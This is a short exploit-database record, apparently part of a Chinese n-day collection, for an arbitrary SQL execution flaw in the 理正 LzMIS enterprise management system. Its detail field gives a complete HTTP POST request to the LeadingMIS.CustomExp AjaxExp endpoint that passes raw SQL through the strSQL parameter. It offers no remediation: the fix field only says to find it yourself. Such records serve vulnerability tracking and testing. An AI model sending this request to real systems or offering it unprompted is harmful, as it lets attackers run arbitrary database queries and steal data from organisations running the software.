vendor = "理正"
name = "理正企业综合管理系统LzMIS任意SQL语句执行"
type = "SQL注入"
version = "未知"
path = "/ajax/LeadingMIS.CustomExp.AjaxExp,LeadingMIS.CustomExp.ashx"
detail = "POST /ajax/LeadingMIS.CustomExp.AjaxExp,LeadingMIS.CustomExp.ashx?_method=ExecSQLScalarToString&_session=no HTTP/1.1 Host: Accept-Encoding: gzip Connection: keep-alive Content-Length: 23 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.1013.22 Safari/537.36 strSQL=select @@version"
fix = "23年洞，自己找"
date = "0704"
label = "nday"
verifier = "AdySec"
